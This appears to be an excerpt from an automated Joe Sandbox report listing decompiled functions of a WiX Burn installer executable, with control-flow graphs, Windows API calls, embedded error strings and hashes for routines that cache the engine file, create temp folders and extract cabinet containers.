                                                                                                                                                                    • Failed to load catalog files., xrefs: 0091780F
                                                                                                                                                                    • WixBundleSourceProcessFolder, xrefs: 00917734
                                                                                                                                                                    • WixBundleOriginalSource, xrefs: 00917759
                                                                                                                                                                    • WixBundleElevated, xrefs: 009176A5, 009176B6
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalInitializeSection
                                                                                                                                                                    • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                                                                                                                                    • API String ID: 32694325-1564579409
                                                                                                                                                                    • Opcode ID: f27b9c370d98d2504a141192e4d0f45d2b321730c9dd88c0d12f70d6acc7388b
                                                                                                                                                                    • Instruction ID: 4d69aac6141fb94be19c9d38fc530b771fde34f9caf2bbb8510884c38510ef20
                                                                                                                                                                    • Opcode Fuzzy Hash: f27b9c370d98d2504a141192e4d0f45d2b321730c9dd88c0d12f70d6acc7388b
                                                                                                                                                                    • Instruction Fuzzy Hash: 63A17072B4461EBFDB12DAE4CC85FEAF77CAB44744F010666B915A7181D730A984CBA0
                                                                                                                                                                    Function 009186D0 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 209fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1413 9186d0-91871e CreateFileW 1414 918720-91872a GetLastError 1413->1414 1415 918764-918774 call 94490d 1413->1415 1417 918737 1414->1417 1418 91872c-918735 1414->1418 1423 918776-918787 call 940237 1415->1423 1424 91878c-918797 call 943edd 1415->1424 1420 918739 1417->1420 1421 91873e-91875f call 903821 call 940237 1417->1421 1418->1417 1420->1421 1436 918908-91891a call 92e06f 1421->1436 1432 918901-918902 CloseHandle 1423->1432 1430 91879c-9187a0 1424->1430 1433 9187a2-9187b6 call 940237 1430->1433 1434 9187bb-9187c0 1430->1434 1432->1436 1433->1432 1434->1432 1435 9187c6-9187d5 SetFilePointerEx 1434->1435 1438 9187d7-9187e1 GetLastError 1435->1438 1439 91880f-91881f call 944e3a 1435->1439 1442 9187e3-9187ec 1438->1442 1443 9187ee 1438->1443 1450 918821-918826 1439->1450 1451 91882b-91883c SetFilePointerEx 1439->1451 1442->1443 1446 9187f0 1443->1446 1447 9187f5-91880a call 903821 1443->1447 1446->1447 1453 9188f9-918900 call 940237 1447->1453 1450->1453 1454 918876-918886 call 944e3a 1451->1454 1455 91883e-918848 GetLastError 1451->1455 1453->1432 1454->1450 1465 918888-918898 call 944e3a 1454->1465 1458 918855 1455->1458 1459 91884a-918853 1455->1459 1460 918857 1458->1460 1461 91885c-918871 call 903821 1458->1461 1459->1458 1460->1461 1461->1453 1465->1450 1469 91889a-9188ab SetFilePointerEx 1465->1469 1470 9188e2-9188f2 call 944e3a 1469->1470 1471 9188ad-9188b7 GetLastError 1469->1471 1470->1432 1479 9188f4 1470->1479 1473 9188c4 1471->1473 1474 9188b9-9188c2 1471->1474 1476 9188c6 1473->1476 1477 9188cb-9188e0 call 903821 1473->1477 1474->1473 1476->1477 1477->1453 1479->1453
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,00904DBC,?,?,00000000,00904DBC,00000000), ref: 00918713
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00918720
                                                                                                                                                                      • Part of subcall function 00943EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00943F73
                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,0094B4B8,00000000,00000000,00000000,?,00000000,0094B500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009187CD
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009187D7
                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,00000000,0094B500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00918902
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to seek to checksum in exe header., xrefs: 00918805
                                                                                                                                                                    • Failed to create engine file at path: %ls, xrefs: 00918751
                                                                                                                                                                    • cache.cpp, xrefs: 00918744, 009187FB, 00918862, 009188D1
                                                                                                                                                                    • Failed to seek to signature table in exe header., xrefs: 0091886C
                                                                                                                                                                    • Failed to seek to original data in exe burn section header., xrefs: 009188DB
                                                                                                                                                                    • msi.dll, xrefs: 00918814
                                                                                                                                                                    • Failed to seek to beginning of engine file: %ls, xrefs: 00918779
                                                                                                                                                                    • Failed to update signature offset., xrefs: 00918821
                                                                                                                                                                    • cabinet.dll, xrefs: 0091887B
                                                                                                                                                                    • Failed to zero out original data offset., xrefs: 009188F4
                                                                                                                                                                    • Failed to copy engine from: %ls to: %ls, xrefs: 009187A8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorLast$CloseCreateHandlePointerRead
                                                                                                                                                                    • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
                                                                                                                                                                    • API String ID: 3456208997-1976062716
                                                                                                                                                                    • Opcode ID: a24765b4376608c47923c15dccf8c4eb5773067c232c8f7ea14dda7a13403f2f
                                                                                                                                                                    • Instruction ID: d38a173b8504a79bac8de4b46ef442594eb733769b2cb8cc6c1c745a7bdaed42
                                                                                                                                                                    • Opcode Fuzzy Hash: a24765b4376608c47923c15dccf8c4eb5773067c232c8f7ea14dda7a13403f2f
                                                                                                                                                                    • Instruction Fuzzy Hash: D451F476B41639ABE7119AA48C46FBF766CEF84B20F110564FE10FB180EB60DC40A7E1
                                                                                                                                                                    Function 0090762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1481 90762c-907edf InitializeCriticalSection 1482 907ee2-907f06 call 905623 1481->1482 1485 907f13-907f24 call 940237 1482->1485 1486 907f08-907f0f 1482->1486 1489 907f27-907f39 call 92e06f 1485->1489 1486->1482 1487 907f11 1486->1487 1487->1489
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(0091756B,009053BD,00000000,00905445), ref: 0090764C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalInitializeSection
                                                                                                                                                                    • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                                                                                                                                    • API String ID: 32694325-3635313340
                                                                                                                                                                    • Opcode ID: c156ed2cc4a4448f7851275a7c4a4c4cfed49b849163b58e0e59dcb3be3c1654
                                                                                                                                                                    • Instruction ID: 06f7d3deee0df0798183c3f82866a38d1d22cb806b8c7f1ddcc73d57e0cac1e1
                                                                                                                                                                    • Opcode Fuzzy Hash: c156ed2cc4a4448f7851275a7c4a4c4cfed49b849163b58e0e59dcb3be3c1654
                                                                                                                                                                    • Instruction Fuzzy Hash: 353237F0D167299FDBB58F5AC98878DFAF4BB49304F5085EED20CA6250D7B01A888F45
                                                                                                                                                                    Function 009182BA Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 153COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1493 9182ba-918303 call 92f8e0 1496 918309-918317 GetCurrentProcess call 940879 1493->1496 1497 91847c-918489 call 902195 1493->1497 1500 91831c-918329 1496->1500 1504 918498-9184aa call 92e06f 1497->1504 1505 91848b 1497->1505 1502 9183b7-9183c5 GetTempPathW 1500->1502 1503 91832f-91833e GetWindowsDirectoryW 1500->1503 1507 9183c7-9183d1 GetLastError 1502->1507 1508 9183ff-918411 UuidCreate 1502->1508 1509 918340-91834a GetLastError 1503->1509 1510 918378-918389 call 90337f 1503->1510 1511 918490-918497 call 940237 1505->1511 1513 9183d3-9183dc 1507->1513 1514 9183de 1507->1514 1518 918413-918418 1508->1518 1519 91841a-91842f StringFromGUID2 1508->1519 1515 918357 1509->1515 1516 91834c-918355 1509->1516 1529 918395-9183ab call 9036a3 1510->1529 1530 91838b-918390 1510->1530 1511->1504 1513->1514 1523 9183e0 1514->1523 1524 9183e5-9183fa call 903821 1514->1524 1525 918359 1515->1525 1526 91835e-918373 call 903821 1515->1526 1516->1515 1518->1511 1521 918431-91844b call 903821 1519->1521 1522 91844d-91846e call 901f13 1519->1522 1521->1511 1541 918470-918475 1522->1541 1542 918477 1522->1542 1523->1524 1524->1511 1525->1526 1526->1511 1529->1508 1543 9183ad-9183b2 1529->1543 1530->1511 1541->1511 1542->1497 1543->1511
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00905489), ref: 00918310
                                                                                                                                                                      • Part of subcall function 00940879: OpenProcessToken.ADVAPI32(?,00000008,?,009053BD,00000000,?,?,?,?,?,?,?,0091769D,00000000), ref: 00940897
                                                                                                                                                                      • Part of subcall function 00940879: GetLastError.KERNEL32(?,?,?,?,?,?,?,0091769D,00000000), ref: 009408A1
                                                                                                                                                                      • Part of subcall function 00940879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0091769D,00000000), ref: 0094092B
                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00918336
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00918340
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 009183BD
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 009183C7
                                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 00918406
                                                                                                                                                                    Strings
                                                                                                                                                                    • Temp\, xrefs: 00918395
                                                                                                                                                                    • Failed to concat Temp directory on windows path for working folder., xrefs: 009183AD
                                                                                                                                                                    • Failed to create working folder guid., xrefs: 00918413
                                                                                                                                                                    • Failed to append bundle id on to temp path for working folder., xrefs: 00918470
                                                                                                                                                                    • Failed to ensure windows path for working folder ended in backslash., xrefs: 0091838B
                                                                                                                                                                    • cache.cpp, xrefs: 00918364, 009183EB, 0091843C
                                                                                                                                                                    • Failed to copy working folder path., xrefs: 0091848B
                                                                                                                                                                    • %ls%ls\, xrefs: 00918458
                                                                                                                                                                    • Failed to get windows path for working folder., xrefs: 0091836E
                                                                                                                                                                    • Failed to get temp path for working folder., xrefs: 009183F5
                                                                                                                                                                    • Failed to convert working folder guid into string., xrefs: 00918446
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                                                                    • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                                                                                                                    • API String ID: 266130487-819636856
                                                                                                                                                                    • Opcode ID: 78f612fda97eed9387c3fc3d50f0f42a4740c235990d82115eeccfeb6d9cbe9d
                                                                                                                                                                    • Instruction ID: 227fa85898c8d27f432bf9c004fd56a2c3a6fdf54720bb72eab9b34a47ab92a3
                                                                                                                                                                    • Opcode Fuzzy Hash: 78f612fda97eed9387c3fc3d50f0f42a4740c235990d82115eeccfeb6d9cbe9d
                                                                                                                                                                    • Instruction Fuzzy Hash: 0341F432F45329A7D730D6A68C0AFDB73ACAB84B15F004565BE04F7190EE74DD4896E1
                                                                                                                                                                    Function 009210FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1544 9210fb-921127 CoInitializeEx 1545 92113b-921186 call 93f483 1544->1545 1546 921129-921136 call 940237 1544->1546 1552 9211b0-9211d2 call 93f4a4 1545->1552 1553 921188-9211ab call 903821 call 940237 1545->1553 1551 92139e-9213b0 call 92e06f 1546->1551 1561 9211d8-9211e0 1552->1561 1562 92128c-921297 SetEvent 1552->1562 1572 921397-921398 CoUninitialize 1553->1572 1566 9211e6-9211ec 1561->1566 1567 92138f-921392 call 93f4b4 1561->1567 1563 9212d6-9212e4 WaitForSingleObject 1562->1563 1564 921299-9212a3 GetLastError 1562->1564 1568 9212e6-9212f0 GetLastError 1563->1568 1569 921318-921323 ResetEvent 1563->1569 1570 9212b0 1564->1570 1571 9212a5-9212ae 1564->1571 1566->1567 1574 9211f2-9211fa 1566->1574 1567->1572 1577 9212f2-9212fb 1568->1577 1578 9212fd 1568->1578 1579 921325-92132f GetLastError 1569->1579 1580 92135a-921360 1569->1580 1581 9212b2 1570->1581 1582 9212b4-9212c4 call 903821 1570->1582 1571->1570 1572->1551 1575 921274-921287 call 940237 1574->1575 1576 9211fc-9211fe 1574->1576 1575->1567 1583 921200 1576->1583 1584 921211-921214 1576->1584 1577->1578 1588 921301-921316 call 903821 1578->1588 1589 9212ff 1578->1589 1590 921331-92133a 1579->1590 1591 92133c 1579->1591 1585 921362-921365 1580->1585 1586 92138a 1580->1586 1581->1582 1620 9212c9-9212d1 call 940237 1582->1620 1593 921202-921204 1583->1593 1594 921206-92120f 1583->1594 1597 921216 1584->1597 1598 92126e 1584->1598 1595 921386-921388 1585->1595 1596 921367-921381 call 903821 1585->1596 1586->1567 1588->1620 1589->1588 1590->1591 1601 921340-921355 call 903821 1591->1601 1602 92133e 1591->1602 1605 921270-921272 1593->1605 1594->1605 1595->1567 1596->1620 1607 921232-921237 1597->1607 1608 921263-921268 1597->1608 1609 921240-921245 1597->1609 1610 921247-92124c 1597->1610 1611 921224-921229 1597->1611 1612 921255-92125a 1597->1612 1613 92126a-92126c 1597->1613 1614 92122b-921230 1597->1614 1615 921239-92123e 1597->1615 1616 92124e-921253 1597->1616 1617 92125c-921261 1597->1617 1618 92121d-921222 1597->1618 1598->1605 1601->1620 1602->1601 1605->1562 1605->1575 1607->1575 1608->1575 1609->1575 1610->1575 1611->1575 1612->1575 1613->1575 1614->1575 1615->1575 1616->1575 1617->1575 1618->1575 1620->1567
                                                                                                                                                                    APIs
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000), ref: 0092111D
                                                                                                                                                                    • CoUninitialize.COMBASE ref: 00921398
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeUninitialize
                                                                                                                                                                    • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                    • API String ID: 3442037557-1168358783
                                                                                                                                                                    • Opcode ID: 93dd3ad9fedcd840d75ffeecdbbbb67fdc7d6ed4fc7efd8527115f13b155890a
                                                                                                                                                                    • Instruction ID: 68d22ebfc330d89f08cb697f8c696d19575065767183241694aa0e1bfb09a6f6
                                                                                                                                                                    • Opcode Fuzzy Hash: 93dd3ad9fedcd840d75ffeecdbbbb67fdc7d6ed4fc7efd8527115f13b155890a
                                                                                                                                                                    • Instruction Fuzzy Hash: 8451AC37D44171E7CF20D7A5AC05EAB36589BE1730B224365FD21FB299D2698C20D2D5
                                                                                                                                                                    Function 009042D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158stringCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1625 9042d7-90432e InitializeCriticalSection * 2 call 914d05 * 2 1630 904452-90445c call 90b48b 1625->1630 1631 904334 1625->1631 1636 904461-904465 1630->1636 1632 90433a-904347 1631->1632 1634 904445-90444c 1632->1634 1635 90434d-904379 lstrlenW * 2 CompareStringW 1632->1635 1634->1630 1634->1632 1637 9043cb-9043f7 lstrlenW * 2 CompareStringW 1635->1637 1638 90437b-90439e lstrlenW 1635->1638 1639 904474-90447c 1636->1639 1640 904467-904473 call 940237 1636->1640 1637->1634 1641 9043f9-90441c lstrlenW 1637->1641 1642 9043a4-9043a9 1638->1642 1643 90448a-90449f call 903821 1638->1643 1640->1639 1646 904422-904427 1641->1646 1647 9044b6-9044d0 call 903821 1641->1647 1642->1643 1648 9043af-9043bf call 9029ce 1642->1648 1655 9044a4-9044ab 1643->1655 1646->1647 1651 90442d-90443d call 9029ce 1646->1651 1647->1655 1658 9043c5 1648->1658 1659 90447f-904488 1648->1659 1651->1659 1663 90443f 1651->1663 1660 9044ac-9044b4 call 940237 1655->1660 1658->1637 1659->1660 1660->1639 1663->1634
                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00905266,?,?,00000000,?,?), ref: 00904303
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(000000D0,?,?,00905266,?,?,00000000,?,?), ref: 0090430C
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00905266,?,?,00000000,?,?), ref: 00904352
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00905266,?,?,00000000,?,?), ref: 0090435C
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00905266,?,?,00000000,?,?), ref: 00904370
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00905266,?,?,00000000,?,?), ref: 00904380
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00905266,?,?,00000000,?,?), ref: 009043D0
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00905266,?,?,00000000,?,?), ref: 009043DA
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00905266,?,?,00000000,?,?), ref: 009043EE
                                                                                                                                                                    • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00905266,?,?,00000000,?,?), ref: 009043FE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                                                                    • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                                    • API String ID: 3039292287-3209860532
                                                                                                                                                                    • Opcode ID: 6fc848be8f88addfcd98544b9980ef46f5c028702baf110d76a78c56eb96dfca
                                                                                                                                                                    • Instruction ID: 53399bdfdc693ce773c27979f08896d17b6ae54ef960c77253ac5bd089e8a749
                                                                                                                                                                    • Opcode Fuzzy Hash: 6fc848be8f88addfcd98544b9980ef46f5c028702baf110d76a78c56eb96dfca
                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51A0B2A44215BFCB20DBA8CC86F9A77ADEF44764F104116F714A72E0D7B0E950CBA0
                                                                                                                                                                    Function 0090C28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1665 90c28f-90c2c1 1666 90c2c3-90c2e1 CreateFileW 1665->1666 1667 90c32b-90c347 GetCurrentProcess * 2 DuplicateHandle 1665->1667 1670 90c383-90c389 1666->1670 1671 90c2e7-90c2f1 GetLastError 1666->1671 1668 90c381 1667->1668 1669 90c349-90c353 GetLastError 1667->1669 1668->1670 1672 90c360 1669->1672 1673 90c355-90c35e 1669->1673 1676 90c393 1670->1676 1677 90c38b-90c391 1670->1677 1674 90c2f3-90c2fc 1671->1674 1675 90c2fe 1671->1675 1678 90c362 1672->1678 1679 90c367-90c37f call 903821 1672->1679 1673->1672 1674->1675 1680 90c300 1675->1680 1681 90c305-90c318 call 903821 1675->1681 1682 90c395-90c3a3 SetFilePointerEx 1676->1682 1677->1682 1678->1679 1693 90c31d-90c326 call 940237 1679->1693 1680->1681 1681->1693 1683 90c3a5-90c3af GetLastError 1682->1683 1684 90c3da-90c3e0 1682->1684 1687 90c3b1-90c3ba 1683->1687 1688 90c3bc 1683->1688 1689 90c3e2-90c3e6 call 921741 1684->1689 1690 90c3fe-90c404 1684->1690 1687->1688 1694 90c3c3-90c3d8 call 903821 1688->1694 1695 90c3be 1688->1695 1699 90c3eb-90c3ef 1689->1699 1693->1690 1703 90c3f6-90c3fd call 940237 1694->1703 1695->1694 1699->1690 1702 90c3f1 1699->1702 1702->1703 1703->1690
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0090C47F,00905405,?,?,00905445), ref: 0090C2D6
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 0090C2E7
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0090C47F,00905405,?,?,00905445,00905445,00000000,?), ref: 0090C336
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 0090C33C
                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000000,?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 0090C33F
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 0090C349
                                                                                                                                                                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 0090C39B
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090C47F,00905405,?,?,00905445,00905445,00000000,?,00000000), ref: 0090C3A5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                                    • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                                                                                                                    • API String ID: 2619879409-373955632
                                                                                                                                                                    • Opcode ID: b1d5e4c1372b0db374dd49940633acdffe18b9363a26334e9bbb8a7f0d083a37
                                                                                                                                                                    • Instruction ID: dbe34c0e390382a200813dc909be1bb48bf9d25bd7285adc3132acb72667a9c9
                                                                                                                                                                    • Opcode Fuzzy Hash: b1d5e4c1372b0db374dd49940633acdffe18b9363a26334e9bbb8a7f0d083a37
